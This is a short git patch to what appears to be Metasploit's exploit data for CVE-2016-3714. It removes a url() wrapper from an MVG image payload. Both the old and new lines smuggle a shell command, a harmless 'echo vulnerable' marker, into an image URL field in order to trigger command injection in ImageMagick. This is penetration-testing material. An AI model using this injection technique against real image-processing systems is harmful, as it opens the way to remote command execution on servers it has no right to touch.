From 2bac46097fbf7f8b93f765ab35c76b1e187c8d5e Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 5 May 2016 02:48:19 -0500 Subject: [PATCH] Remove url() for MVG Technically unnecessary here. --- data/exploits/CVE-2016-3714/msf.mvg | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/data/exploits/CVE-2016-3714/msf.mvg b/data/exploits/CVE-2016-3714/msf.mvg index 0b161e0b0a..f53afc7afc 100644 --- a/data/exploits/CVE-2016-3714/msf.mvg +++ b/data/exploits/CVE-2016-3714/msf.mvg @@ -3,6 +3,6 @@ encoding "UTF-8" viewbox 0 0 1 1 affine 1 0 0 1 0 0 push graphic-context -image Over 0,0 1,1 'url(https://localhost";echo vulnerable")' +image Over 0,0 1,1 'https://localhost";echo vulnerable"' pop graphic-context pop graphic-context